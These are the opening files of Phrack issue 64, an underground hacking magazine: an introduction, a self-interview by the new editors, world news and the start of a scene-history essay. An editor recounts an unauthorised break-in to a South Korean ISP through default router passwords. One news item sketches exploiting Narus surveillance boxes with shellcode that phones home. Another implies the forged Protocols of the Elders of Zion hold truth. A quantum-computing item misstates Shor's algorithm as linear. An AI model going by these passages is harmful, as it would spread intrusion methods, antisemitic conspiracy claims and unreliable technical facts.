Phrack #64













              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 1               (* *)
            | - |                                            | - |
            |   |               Introduction                 |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                                            |   |

"As long as there is technology, there will be hackers. As long as there
are hackers, there will be PHRACK magazine. We look forward to the next
20 years"

This is how the PHRACK63 Introduction was ending, telling everybody that
the Staff would have changed and to expect a release sometimes in
2006/2007. This is that release. This is the new staff, "The Circle of
Lost Hackers". Every new management requires a presentation and we decided
to do it by Prophiling ourselves. Useless to say, we'll keep anonymous,
mainly for security reasons that everyone understands.

Being anonymous doesn't mean at all being closed. Phrack staff has always
evolved, and will always evolve, depending on who really care about being
a smart-ass. The staff will always receive new people that cares about
writing cool articles, meet new authors and help them at publishing their
work in the best conditions. Grantee of freedom of speech will be
preserved. It is the identity of our journal.

Some people were starting to say that phrack would have never reborn. That
there would have never been a PHRACK64 issue. We heard that while we were
working on, we smiled and kept going on. Some others were saying that the
spirit was lost, that everything was lost.

No, Phrack is not dead. Neither is the spirit in it.

All the past Phrack editors have done a great work, making the Phrack
Magazine "the most technical, most original, the most Hacker magazine in
the world", written by the Underground for the Underground.
We are in debt with them, every single hacker, cracker or researcher
of the Underground should feel in debt with them.
For the work they did.
For the spirit they contributed to spread.
For the possibility of having a real Hacker magazine.

No, nothing is or was ever lost. Things change, security becomes a
business, some hackers sell exploits, others post for fame, but Phrack is
here, totally free, for the community. No business, no industry, no honey,

We know the burden of responsibility that we have and that's why we worked
hard to bring you this release. It wasn't an easy challenge at all, we
have lost some people during those months and met new ones. We decided to
make our first issue without a "real" CFP, but just limit it to the
closest people we had in the underground. A big thank to everyone who
participated. We needed to understand who really was involved and who was
lacking time, spirit or motivation: having each one a lot of work to do
(writing, reviewing, extending and coding) was the best way to succeed in
that. This is not a "change of direction", next issues will have their
official CFP and whatever article is (and has always been) welcome.

We know that we have a lot to learn, we're improving from our mistakes and
from the problems we've been facing. Aswell, we know that this release is
not "the perfect one", but we think that the right spirit is there and so
is the endeavor. The promise to make each new release a better one is a
challenge that we want to win.

No, Phrack is not dead. And will never die.
Long live to PHRACK.

   - The Circle of Lost Hackers


For this issue, we're bringing you the following :

0x01 Introduction                                 The Circle of Lost Hackers
0x02 Phrack Prophile of the new editors           The Circle of Lost Hackers
0x03 Phrack World News                            The Circle of Lost Hackers
0x04 A brief history of the Underground scene     The Circle of Lost Hackers
0x05 Hijacking RDS TMC traffic information signal                      lcars
0x06 Attacking the Core: Kernel Exploitation Notes                      twiz
0x07 The revolution will be on YouTube                                gladio
0x08 Automated vulnerability auditing in machine code           Tyler Durden
0x09 The use of set_head to defeat the wilderness                       g463
0x0a Cryptanalysis of DPA-128                                           sysk
0x0b Mac OS X Wars - A XNU Hope                                         nemo
0x0c Hacking deeper in the system                                    ankhara
0x0d The art of exploitation: Autopsy of cvsxpl                  Ac1dB1tch3z
0x0e Facing the cops					               Lance
0x0f Remote blind TCP/IP spoofing				         Lkm
0x10 Hacking your brain: The projection of consciousness             keptune
0x11 International scenes				             Various

Scene Shoutz:

All the people who helped us during the writing of this issue especialy 
assad, js, mx-, krk, sysk. Thank you for your support to Phrack. The
magazine deserve a good amount of work and it is not possible without
a strong and devoted team of hackers, admins, and coders.

The circle of lost hackers is not a precise entity and people can join
and quit it, but the main goal is always to give Phrack the release
deserved by the underground hacking community. You can join us whenever
you want to present a decent work to a wider range of peoples. We
also need reviewers on all topics related to hardware hacking and
body/mind experience.

All the retards who pretend to be blackhat on irc and did a pityful
attempt to leak Phrack on Full-Disclosure : Applause (Even the changes
in the title were so subtle, a pity you did not put any rm -fr in the
code, maybe you didnt know how to use uudecode ?)

Enjoy the magazine!


Nothing may be reproduced in whole or in part without the prior written
permission from the editors. Phrack Magazine is made available to the
public, as often as possible, free of charge.

|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E

Editors           : circle[at]phrack{dot}org
Submissions       : circle[at]phrack{dot}org
Commentary        : loopback[@]phrack{dot}org
Phrack World News : pwn[at]phrack{dot}org


Submissions may be encrypted with the following PGP key:
(Hint: Always use the PGP key from the latest issue)

Version: GnuPG v1.4.5 (GNU/Linux)


phrack:~# head -22 /usr/include/std-disclaimer.h
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.



             _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 2              (* *)
            | - |                                            | - |
            |   |              Phrack Pro-Phile              |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                                            |   |

Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring
info to you, the users, about old and highly important controversial
peoples. The first Phrack Pro-Phile was created in Phrack Issue 4 by
Taran King. Since this date, a total of 43 profile were realized. Some
well know hackers were profiled like Taran King, The Mentor,
Knigh Lighting, Lex Luthor, Emmanuel Goldstein, Erik Bloodaxe,
Control-C, Mudge, Aleph-One, Route, Voyager, Horizon or more
recently Scut.

This prophile is probably a little more different since it will introduce
the new staff. Since the people composing The Circle of Lost Hackers
want to stay anonymous, the Prophile will be more a "question-answer"



Handle: The Circle of Lost Hackers
Call them: call them what you want, just be careful
Handle Origin: Dead Poets Society movie
Date of Birth: from 1977 to 1984
Age at current date: haha
Countries of origin: America, South-America and Europe


Favorite Things

Women    : Angelina Jolie because she was a great hacker in a movie
Cars     : Like everyone, the Dolorean. The only nice car in the 
Foods    : Italian food is without a doubt the best food. Some other
           prefer Chinese or Japanese once they tasted Yakitori's.
Alcohols : anything which make you drunk
Drugs    : sex
Music    : Drum and Bass, Sublime, Orbital, Red Hot Chili Peppers, DJ 
           Shadow, The Chemical Brothers, The Mars Volta, more generally 
           death metal, and gothic rock. Abstract electro bands like 
           Boards of Canada.
Movies   : Blade Runner, The Usual Suspect, Fight Club, Kill Bill,  
           hackers (private joke)
Authors  : Gurdjieff, Rufolf Steiner, Rupert Sheldrake, Plato, Stephan
           Hawkings, Roger Penrose, George Orwell, Noam Chomsky,
           Sun Tzu, Nicolas Tesla, Douglas Hofstadter, Ernesto Guevara,
           Daniel Pennac, Gabriele Romagnoli  


Open Interview

Q: Hello
A: Saluto amigo!

Q: Can you introduce yourselves in a few words?
A: The Circle of Lost Hackers is a group of friends overall. Two years 
   ago when TESO decided to stop Phrack, the voice of the underground  
   decided not to let Phrack dying. People started to wonder .. Phrack is
   really dead ? In no way it is. Phrack reborns, always, from the 
   influence of multiple hacking crews to make this possible. But at the 
   beginning it was not easy to create a new team, a lot of people agreed 
   to continue Phrack but not really to write or review articles. Also, 
   one of the most important thing was to have people with the good 
   spirit. Now we think that we have a good team and we hope bring to the 
   Underground scene a lot of quality papers like in old issues of Phrack,
   but keeping the technical touch that makes Phrack a unique hacking 
   magazine. The Phrack staff evolves and will always evoluate a new 
   talents get interested in sharing for fun and free information.

Q: How many people are composing The Circle of Lost Hackers?
A: We could tell you, but we would have to kill you, after. The only
   important thing is that  "The Circle of Lost Hackers" is not a
   restricted club. More people will join us, others may leave, depending
   on who really believes in comunication, hacking and freedom of research
   and information. 

Q: When did you start to play with computers and to learn hacking?
A: Each one of us could answer differently. There's not a "perfect" age to
   start, neither it is ever too late to start. Hacking is researching. It
   is being so obstinated on resolving and understanding things to spend
   nights over a code, a vulnerability, an electronic device, an idea. 

   Hacking is something you have inside, maybe you'll never take a
   computer or write a code, but if you've an "hacking mind" it will
   reveal itself, sooner or later. 

   To give you an idea of the first computers of some members of the
   team, it was a 286, 486 SX or an Amiga 1000. Each of us started
   to play with computer at the end of 80' or beginning of 90'. The
   hacking life of our team started more or less around 97. Like with
   a lot of people, Phrack and 2600 mag were and are a great source of 
   inspiration, as well as IRC and reading source code.

Q: This interview is quite strange, you do the questions and the
   answers at the same time ?!?!
A: What's the problem, in phrack issue 20 Taran King did a prophile
   of himself!!!

Q: Can you tell us what is your most memorable experience?
A: Each of us has a lot of memorable experiences but we don't really have
   a common experience where we hacked all together. So to make easy we 
   are going to take three of our "memorable" experiences.
   A subtle modification about p0f wich made me finding documents 
   that I wasn't supposed to find. Some years ago, I had a period when 
   each month I tried to focus on the security of one country. One of
   those countries was South-Korea where I owned a big ISP. After 
   spending some time to figure out how I could leave the DMZ and enter
   in the LAN, I succeed thanks to a cisco modification (I like
   default passwords). Once in the LAN and after hiding my activity
   (userland > kernelland), I installed a slightly modification of
   p0f. The purpose if this version was to scan automatically all 
   the windows box found on the network, mount shared folders and 
   list all files in these folders. Nothing fantastic. But one of 
   the computers scanned contained a lot of files about the other
   Korea... North Korea. And trust me, there were files that I
   wasn't supposed to find. I couldn't believe it. I could do the 
   evil guy and try to sell these files for money, but I had (and 
   I still have) a hacker ethic. So I simply added a text file on 
   the desktop to warn the user of the "flaw". After that I left 
   the network and I didn't come back. It was more than 5 years 
   ago so don't ask me the name of the ISP I can't remember.

   Learning hacking by practice with some of the best hackers world-wide.
   Sometimes you think you know something but its almost always possible 
   to find someone who prove you the opposite. Wether we talk about 
   hacking a very big network with many thousands of accounts and know 
   exactly how to handle this in minuts in the stealthiest manner, or 
   about auditing source code and find vulnerability in a daemon server or
   Operating System used by millions of peoples on the planet, there is 
   always someone to find that outsmart you, when you thought being one of
   the best in what you are doing. I do not want to enter in detail to 
   avoid compromising anyone's integrity, but the best experience are 
   those made of small groups (3, 4 ..) of hackers, working on something 
   in common (hacking, exploits, coding, audits ..), for example in a 
   screen session. Learning by seing the others do. Teaching younger 
   hackers. Sharing knowledge in a very restricted personal area.
   Partying in private with hackers from all around the world and getting 
   0day found, coded, and used in a single hacking session. 

Q: Is one of you has been busted in a previous life?
A: Hope no but who knows?

Q: What do you think about the current scene?
A: We think a lot of things, probably the best answer is to read the
   article "A brief history of the Underground" in this issue where 
   we are talking about the scene and the Underground.

Q: What's your opinion about old phracks?
A: Great. Old phracks were the first source of information when we were
   starving for more to learn. _The_ point of reference. But don't stop
   yourselves to the last 10 issues, all issues are still interesting.

Q: And about PHC?
A: Well, thats an interesting question. To be honest, PHC did not just do
   those bad things we were used to learn from the web or irc, we like some
   of them and even know very well a few others. Also, the two attempted 
   issues 62 and 63 of PHC had an incontestable renew in the spirit and 
   there were even some useful information on honeypots and protecting 

   However, we have a problem with unjustified arrogance. If it's true 
   the security world has a problem with white/black hats, we think that 
   the good way to resolve the problem is not to fight everyone, 
   especially such a poor demonstrative way. It's not our conception of 
   hacking. Take the first 20 issues of Phrack and try to find unjustified
   arrogant word/sentence/paragraph: you won't find any. The essence of 
   hacking is different : it's learning. Hacking to learn. 

   You can be a blackhat and working in the IT industry, it's
   not incompatible. We have nothing against PHC and we think the
   Underground needs a group like PHC. But the Underground needs a magazine
   like Phrack as well. The main battle of PHC is fighting whitehats but
   it's not Phrack's battle. It's never been the purpose of Phrack. 
   If we have to fight against something, it's against the society and 
   not targeting whitehats personally (that doesn't mean that we support 
   whitehat...). Phrack is about fighting the society by releasing 
   information about technologies that we are not supposed to learn. And 
   these technologies are not only Unix-related and/or software 

   We agree with them when they say that recent issues of Phrack helped 
   probably too much the security industry and that there was a lack of 
   spirit. We're doing our best to change it. But we still need technical 
   articles. If they want to change something in the Underground, they are 
   welcome to contribute to Phrack. Like everyone in the Underground 

Q: Full-disclosure or non-disclosure? 
A: Semi-disclosure. For us, obviously. Free exchange of techniques, ideas
   and codes, but not ready-to-use exploit, neither ready-to-patch

   Keep your bugs for yourself and for your friend, do the best to not
   make them leak. If you're cool enough, you'll find many and you'll be
   able to patch your boxes.

   Disclosing techniques, ideas and codes implementations helps the other
   Hackers in their work, disclosing bugs or releasing "0-day" exploits
   helps only the Security Industry and the script kiddies.
   And we don't want that.

   You might be an Admin, you might be thinking : "oh, but my box is not
   safe if i don't know about vulnerabilities". That's true, but remember
   that if only very skilled hackers have a bug you won't have to face a
   "rm -rf" of the box or a web defacement. That's kiddies game, not
   Hackers one.

   But that's our opinion. You might have a totally different one and we
   will respect it. You might even want to release a totally unknown bug
   on Phrack's pages and, if you write a good article, we'll help you in
   publishing it. Maybe discussing the idea, before.

   As we said in the introduction, the first thing we want to garantee
   is freedom of speech. That's the identity of our journal.

Q: What's the best advice that you can give to new generation of hackers?
A: First of all, enjoy hacking. Don't do that for fame or to earn more
   money, neither to impress girl (hint: not always works ;)) or only to
   be published somewhere. Hack for yourself, hack for your interest, hack
   to learn. 

   Second, be careful. In every thing you do, in any relationship you'll
   have. Respect people and try to not distrupt their work only because
   you're distracted or angry. 

   Third, have fun. Have a lot of fun.

   And never, never, never setup an honeypot (hi Lance!).

Q: What do you think about starting an Underground World Revolution
   Movement against the establishment ?
A: Do it. But do it Underground. The nowadays world is too obsessed by
   "visibility". Act, let the others talk.

Q: What's the future of hacking ?
A: The future is similar to the present and to the past. "Hacking" is the
   resulting mix of curiosity and research for information, fun and 
   freedom. Things change, security evolves and so does technology, but the
   "hacker-mind" is always the same. There will always be hackers, that is
   skilled people who wants to understand how things really go.

   To be more concrete, we think that the near future will see way more
   interest in hardware and embedded systems hacking : hardware chip
   modification to circumvent hardware based restrictions, mobile and
   mobile services exploits/attacks, etc.
   Moreover, seems like more people is hacking for money (or, at least,
   that's more "publicly" known), selling exploits or backdoors. Money is
   usually the source of many evils. It is indeed a good motivating factor
   (moreover hacking requires time and having that time payed when you
   don't have any other work is really helpful), but money brings with
   itself the business mind. People who pays hackers aren't interested in
   research, they are interested in business. They don't want to pay for
   months of research that lead to a complex and eleet tecnique, they want
   a simple php bug to break into other companies website and change the
   homepage. They want visible impact, not evolved culture. 

   We're not for the "hacking-business" idea, you probably realized that.
   We're not for exploit disclosure too, unless the bug is already known
   since time and showing the exploit code would let better understand the
   coding techniques involved. And we don't want that someone with a lot of
   money (read : governement and big companies) will be one day able to
   "pay" (and thus "buy") all the hackers around. 

   But we're sure that that will never happen, thanks to the underground,
   thanks to people like you who read phrack, learn, create and hack

Q: Do you have some people or groups to mention ?
A: (mentioning some people and say what do u thing about them, phc, etc)
   There are groups and people who have made (or are making) the effective
   evolving of the scene. We try to tell a bit of their story in
   "International Scenes" phile (starting from that issue with : Quebec, 
   Brazil and France). Each country has its story, Italy has s0ftpj 
   and antifork, Germany has TESO, THC and Phenolit (thanks for your great 
   ph-neutral party), Russia, France, Netherlands, or Belgium have ADM, 
   Synnergy, or Devhell, USA and other countries have PHC...

   Each one will have his space on "International Scenes". If you're part
   of it, if you want to tell the "real story", just submit us a text. If
   you are too paranoid to submit a tfile to Phrack, its ok. If you wish
   to participate to the underground information, how journal is your
   journal as well and we can find a solution that keep you anonymous.

Q: Thank you for this interview, I hope readers will enjoy it!
A; No problem, you're welcome. Can I have a beer now?



              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 3               (* *)
            | - |                                            | - |
            |   |            Phrack World News               |   |
            |   |                                            |   |
            |   |   compiled by The Circle of Lost Hackers   |   |
            |   |                                            |   |
            |   |                                            |   |

The Circle of Lost Hackers is looking for any kind of news related to
security, hacking, conference report, philosophy, psychology, surrealism,
new technologies, space war, spying systems, information warfare, secret
societies, ... anything interesting! It could be a simple news with just
an URL, a short text or a long text. Feel free to send us your news.

Again, we need your help for this section. We can't know everything,
we try to do our best, but we need you ... the scene needs you...the
humanity needs you...even your girlfriend needs you but should already
know this... :-)

1. Speedy Gonzales news
2. One more outrage to the freedom of expression
3. How we could defeat the Orwellian Narus system
4. Feeling safer in a spying world
5. D-Wave computing demonstrates a quantum computer


--[ 1.

 _____                     _
/  ___|                   | |
\ `--. _ __   ___  ___  __| |_   _
 `--. \ '_ \ / _ \/ _ \/ _` | | | |
/\__/ / |_) |  __/  __/ (_| | |_| |
\____/| .__/ \___|\___|\__,_|\__, |
      | |                     __/ |
      |_|                    |___/
 _____                      _
|  __ \                    | |
| |  \/ ___  _ __  ______ _| | ___  ___
| | __ / _ \| '_ \|_  / _` | |/ _ \/ __|
| |_\ \ (_) | | | |/ / (_| | |  __/\__ \
 \____/\___/|_| |_/___\__,_|_|\___||___/
 _   _
| \ | |
|  \| | _____      _____
| . ` |/ _ \ \ /\ / / __|
| |\  |  __/\ V  V /\__ \
\_| \_/\___| \_/\_/ |___/

-Speedy News-[ There is no age to start hacking ]--

-Speedy News-[ Eeye hacked ? ]--

-Speedy News-[ Anarchist Cookbook ]--

   The anarchist cookbook version 2006, be careful...

-Speedy News-[ Is Hezbollah better than Israeli militants? ]--

-Speedy News-[ How to be secure like an 31337 DoD dude ]--

-Speedy News-[ Hi I'm Skyper, ex-Phrack and I like Phrack's design! ]--

-Speedy News-[ The most obscure company in the world ]--

A "MUST READ" article...

-Speedy News-[ Terrorism excuse Vs freedom of information ]--

-Speedy News-[ Zero Day can happen to anyone ]--

-Speedy News-[ NSA, contractors and the success of failure ]--

-Speedy News-[Blood, Bullets, Bombs, and Bandwidth ]--

-Speedy News-[ The day when the BCC predicted the future ]--

-Spirit News-[ Just because we like these websites ]--

--[ 2. One more outrage to the freedom of expression
		by Napoleon Bonaparte

The distribution of a book containing a copy of the Protocols of
the Elders of Zion was stopped in Belgium and France by Israeli 

The authors advance that the bombing of the WTC could be in relation with
Israel. It's not the good place to argue about this statement, but what
is interesting is that 6 years after 11/09/01 we read probably more than
100 theories about the possible authors of WTC bombing: Al Qaeda, Saoudi
Arabia, Irak (!) or even Americans themselves. But this book advances the
theory that _maybe_ there is something with Israel and the diffusion is
forbidden, just one month after its release.

Before releasing this book, the Belgian association
read it to give his opinion. The result is apparent: the book is not
antisemitic. The only two things that could be antisemitic in this book

- the diffusion of "The Protocols of the Elders of Zion" in the annexe
of the book. If you take a look on Amazon, you can find more than
30 books containing The Protocols.

- the cover of the book which show the US and Israeli flags linked with a
bundle of dollars.

Actually you can find the same kind of picture on the website of the
Americo-Israeli company Zionoil: . And the
cover of the book was designed before the author found the same picture on
Zionoil's website.

Also, something unsettling in this story is that the book was removed
on the insistence of a Belgian politician: Claude Marinower. And on the
website of this politician, we can see him with Moshe Katsav who is the
president of Israel and recently accused by Attorney General Meni Mazuz
for having committed rape and other crimes...

So why the distribution of this book was banned? Because the diffusion of
"The Protocols of the Elders of Zion" is dangerous? Maybe but...

You can find on Internet or amazon some books like "The Anarchist
Cookbook" which is really more "dangerous" than the "The Protocols of
the Elders of Zion".  In this book you can find some information like how
to kill someone or how to make a bomb. If we have to give to our children
either "The Anarchist Cookbook" or "The Protocols of the Elders of Zion",
I'm sure that 100% of the population will prefer to give "The Protocols
of the Elders of Zion". Simply because it's not dangerous.

So why? Probably because there are some truth in this book.

The revelations in this book are not only about 11/09/2001 but also about
the Brabant massacres in Belgium from 1982 to 1985. The authors advances
that these massacres were linked to the GLADIO/stay-behind network.

As Napoleon Bonaparte said: "History is a set of lies agreed upon".

He was right...







--[ 3. How we could defeat the Orwellian Narus system
		by Napoleon Bonaparte

AT&T, Verizon, VeriSign, Amdocs, Cisco, BellSouth, Top Layer Networks,
Narus, ... all theses companies are inter-connected in our wonderful
Orwellian world. And I don't even talk about companies like Raytheon
or others involved in "ECHELON".

That's not new, our governments spy us. They eavesdrop our phones
conversation, our Internet communications, they take beautiful
photos of us with their imagery satellites, they can even see through
walls using satellites reconnaissance (Lacrosse/Onyx?), they install
cameras everywhere in our cities (how many cameras in London???),
RFID tags are more and more present and with upcoming technologies like
nanotechnologies, bio-informatics or smartdusts system there is really
something to worry about.

With all these systems already installed, it's utopian to think that
we could come back to a world without any spying system. So what we
can do ? Probably not a lot of things. But I would like to propose a
funny idea about NARUS, the system allowing governments to eavesdrop
citizens Internet communications.

This short article is not an introduction to Narus. I will just give
you a short description of its capacities. A more longer article
could be written in a next release of Phrack (any volunteer?). So
Narus is an American company founded in 97. The first work of NARUS
was to analyze IP network traffic for billing purpose. In order to
accomplish this they have strongly contributed to the standardization
of the IPDR Streaming Protocol by releasing an API Code [1] (study this
doc, it's a key to break NARUS). Nowadays, Narus is also included in
what I will call the "spying business". According to their authors,
they can collect data from links, routers, soft switches, IDS/IPS,
databases, ..., normalize, correlate, aggregate and analyze all these
data to provide a comprehensive and detailed model of users, elements,
protocols, applications and networks behaviors. And the most important:
everything is done in real time. So all your e-mails, instant messages,
video streams, P2P traffic, HTTP traffic or VOIP can be monitored. And
they doesn't care about which transmission technology you use, optical
transmission can also be monitored. This system is simply amazing and 
we should send our congratulations to their designers. But we should 
also send our fears...

If we want to block Narus, there is an obvious way: using
cryptography. Nowadays, it's quite easy to send an encrypted email. You
don't even have to worry about your email client, everything it's
transparent (once configured). The problem is that you need to give
your public key to your interlocutor, which is not really "user
friendly". Especially if the purpose is simply to send an email to
your girlfriend. But it's still the best solution to block a system
like Narus. Another way to block Narus is to use steganography, but
it's more complicate to implement.

In conclusion, there is no way to stop totally a system like Narus and
the only good way to block it is to use cryptography. But we, hackers,
we can do something against Narus. Something funny. The idea is the
following: we should know where a Narus system is installed!

First step. An organization, a country or simply someone should buy
a Narus system and reverse it. There are a lot of tools to reverse a
system, free or commercial. Since the purpose of Narus is to analyze
data, the main task is parsing data. And we know that systems parsing
data are the most sensitive to bugs. So a first idea could be to fuzzing
it with random requests and if it doesn't work doing some reversing. Once
a bug is detected (and for sure, there IS at least one bug), the next
step is to exploit it. Difficult task but not impossible. The most
interesting part is the next one: the shellcode.

There are two possibilities, either the system where Narus is installed
has an outgoing Internet connexion or there isn't an outgoing Internet
connexion. If not, the shellcode will be quite limited, the "best"
idea is maybe just to destroy the system but it's not useful. What is
useful is when Narus is installed on a system with an outgoing Internet
connexion. We don't want a shell or something like that on the system,
what we want is to know where a Narus system is installed. So what our
shellcode has to do is just to send a ping or a special packet to a
server on Internet to say "hello a Narus is installed at this place". We
could hold a database with all the Narus system we discover in the world.

This idea is probably not very difficult to implement. The only bad
thing is if we release the vulnerability, it won't take a long time to
Narus to patch it.

But after all, what else can we do?

Again, as Napoleon said: "Victory belongs to the most persevering".

And hackers are...


--[ 4. Feeling safer in a spying world
		by Julius Caesar

At first, it's subtle. It just sneaks up on you. The only ones who
notice are the paranoid tinfoil hat nutjobs -- the ones screaming about
conspiracies and big brother. They take a coincidence here and a fact
from over there and come up with 42. It's all about 42.

We need cameras at ATM machines, to catch robbers and muggers. Sometimes
they even catch a shot of the Ryder truck driving by in the background. 
People get mugged in elevators, so we need some cameras there too. 
Traffic can be backed up for a while before the authorities notice, so 
let's have some cameras on the highway. Resolution gets better, and we 
can catch more child molestors and terrorists if they can record license 
plates and faces.

Cameras at intersections catch people running red lights and
speeding. We're getting safer every day.

Some neighborhoods need cameras to catch the hoods shooting each
other. Others need cameras to keep the sidewalks safe for shoppers. It's
all about safety.

Then one day, the former head of the KGIA is in charge, or arranges
for his dimwitted son to fuck up yet again as president of something.

Soon, we're at war. Not with anyone in particular. Just Them. You're
either with us, or you're with Them, and we're gonna to git Them.

Our phone calls need to me monitored, to make sure we're not one
of Them. Our web browsing and shopping and banking and reading and
writing and travel and credit all need to be monitored, so we can catch
Them. We'll need to be seached when travelling or visiting a government
building because we might have pointy metal things or guns on us. We
don't want to be like Them.

It's important to be safe, but how can we tell if we're safe or not? What
if we wonder into a place with no cameras? How would we know? What if
our web browsing isn't being monitored? How can we make sure we're safe?

Fortunately, there are ways.

Cameras see through a lens, and lenses have specific shapes with unique
characteristics. If we're in the viewing area  of a camera, then we
are perpendicular to a part of the surface of the lens, which usually
has reflective properties. This allows us to know when we're safely in
view of a camera.

All it takes is a few organic LEDs and a power supply (like a 9V
battery). Arrange the LEDs in a circle about 35mm in diameter, and wire
them appropriately for the power supply. Cut a hole in the center of
the circle formed by the LEDs.

Now look through the hole as you pan around the room. When you're
pointing at a lens, the portion of the curved surface of the lens which
is perpendicular to you will reflect the light of the LEDs directly
back at you. You'll notice a small bright white pinpoint. Blink the
LEDs on and off to make sure it's reflecting your LEDs, and know that
you are now safer.

Worried that your Internet connection may not be properly monitored
for activity that would identify you as one of Them? There are ways to
confirm this too.

Older equipment, such as carnivore or DCS1000 could often be detected
by traceroute, which would show up as odd hops on your route to the
net. As recently as 2006, AT&T's efforts to keep us safe showed up with
traceroute. But the forces of Them have prevailed, and our protectors
were forced to stop watching our net traffic. Almost. We can no longer
feel safe when seeing that odd hop, because it doesn't show up on
traceroute anymore.

It will, however, show up with ping -R, which requests every machine
to add its IP to the ping packet as it travels the network.

First, do a traceroute to find out where your ISP connects to the rest
of the net;

 5 (  28.902 ms  14.221 ms  13.883 ms
 6 (  19.833 ms *
 21.768 ms
 7 (  19.781 ms  19.092
 ms  17.356 ms

Hop #5 is on comcast's network. Hop #6 is their transit provider. We
want to send a ping -R to the transit provider

[root@phrack root]# ping -R
PING ( from XXX.XXX.XXX.XXX : 56(124) bytes
of data.
64 bytes from icmp_seq=0 ttl=243 time=31.235 msec
RR:	[snip] domain name pointer

An AT&T hop on Level3's network? Wow, we are still safely under the
watchful eye of our magnificent benevolent intelligence agencies. I
feel safer already.

--[ 5. D-Wave demonstrates a quantum computer
	     by aris

February the 13'th, 2007, Wave computing made a public demonstration
of their brand-new quantum computer, which could be a revolution in 
computing and in cryptography in general. The demonstration took 
place at Mountain View, Silicon Valley, though the quantum computer 
itself was left at Vancouver, remotely connected by Internet.

The Quantum computer is a hybrid construction of classical computing and
a quantum "accelerator" chip: The classical computer makes the ordinary
operations, isolates the complicate stuff, prepare it to be processed
by the quantum chip then gives back the results. The whole mechanism
is meant to be usable over networks (with RPC) to be accessible for
companies that want a quantum computer but can't manage to handle it
at their main office (The hardware has special requirements). [1]

The quantum chip is a 16 Qbits engine, using superconductiong

Previous tries to do quantum computers were made previously, none of them
known to have more than 3 or 4 Qbits. D-Wave also pretends being able
to scale that number of Qbits up to 1024 in 2008 ! That fact made a lot
of people in scientific area skeptic about the claims of D-Wave. The US
National Aeronautics and Space Administration (commonly known as NASA)
confirmed to the press that they've built the special chip for D-Wave
conforming their specifications. [2]

Now, how does the chip works ? D-Wave hasn't released that much details
about the internals of their chip. They have chosen the superconductor
because it makes easier to exploit quantum mechanics. When atoms are 
very cold (approaching the 0K), they transform themselves into 
superconducting atoms. They have special characteristics, including the 
fact their electrons get a different quantum behaviur.

In the internals, the chips contains 16 Qbits arranged in a 4x4 grid,
each Qbit being coupled with its four immediate neighbors and some in
the diagonals. [3]

The coupling of Qbits is what gives them their power : a Qbit is
believed to be at two states at same time. When coupling two Qbits,
the combination of their state contains four states, and so on.
The more Qbits are coupled together, the more possible number of states
they have, and when working an algorithm on them, you manipulate all
of their states at once, giving a very important performance boost. By
its nature, it may even help to resolve NP-Complete problems, that is,
problems that cannot be resolved by polynomial algorithms (we think
of large sudoku maps, multivariate polynomial systems, factoring large
integers ...).

Not coupling all of their Qbits makes their chip easier to build and
to scale, but their 16Qbits computer is not equal to the theoretical 16
Qbits computers academics and governments are trying to build for years.

The impact of this news to the world is currently minimal. Their chips
currently work slower than a low-range personal computer and costs
thousands of dollars, but maybe in some years it will become a real
solution for solving NP problems.

The NP problem that most people involved in security know is obviously
the factoring of large numbers. We even have a proof that it exists
a *linear* algorithm to factorize a multiple of two large integers,
it is named Shor's algorithm. It means when we'll have the hardware
to run it, factorizing a 1024 bits RSA private key will only take two
times the time needed to factorize a 512 bits key.

It completely destroys the security of the public cryptography as we
know it now.
Unfortunaly, we have no information on which known quantum algorithms
run on D-Wave computer, and D-Wave made no statement about running
Shor's algorithm on their beast. Also, no claim have been given letting
us think the chip could break RSA. And for sure, NSA experts probably
already studied the situation (in the case they don't already own their
own quantum computer).




              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 4              (* *)
            | - |                                            | - |
            |   |  A brief history of the Underground scene  |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                  |   |

--[ Contents

1. Introduction
2. The security paradox
3. Past and present Underground scene
	3.1. A lack of culture and respect for ancient hackers
	3.2. A brief history of Phrack
	3.3. The current zombie scene
4. Are security experts better than hackers?
	4.1. The beautiful world of corporate security
	4.2. The in-depth knowledge of security conferences
5. Phrack and the axis of counter attacks
	5.1. Old idea, good idea
	5.2. Improving your hacking skills
	5.3. The Underground yellow pages
	5.4. The axis of knowledge
		5.4.1. New Technologies
		5.4.2. Hidden and private networks
		5.4.3. Information warfare
		5.4.4. Spying System
6. Conclusion

--[ 1. Introduction

"It's been a long long time,
I kept this message for you, Underground
But it seems I was never on time
Still I wanna get through to you, Underground..."

    I am sure most of you know and love this song (Stir it Up). After all,
who doesn't like a Bob Marley song? The lyrics of this song fit very well
with my feeling : I was never on time but now I'm ready to deliver you
the message.

    So what is this article about? I could write another technical article
about an eleet technique to bypass a buffer overflow protection, how to
inject my magical module in the kernel, how to reverse like an eleet or
even how to make a shellcode for a not-so-famous OS. But I won't. There
are some other people who can do it much better than I could. 

    But it is the reason not to write a technical article. The purpose of 
this article is to launch an SOS. An SOS to the scene, to everyone, to all 
the hackers in the world. To make all the next releases of Phrack better 
than ever before. And for this I don't need a technical article. I need 
what I would call Spirit.

    Do you know what I mean by the word spirit?

--[ 2. The security paradox.

    There is something strange, really strange. I always compare the
security world with the drug world. Take the drugs world, on the one side
you have all the "bad" guys: cartels, dealers, retailers, users... On
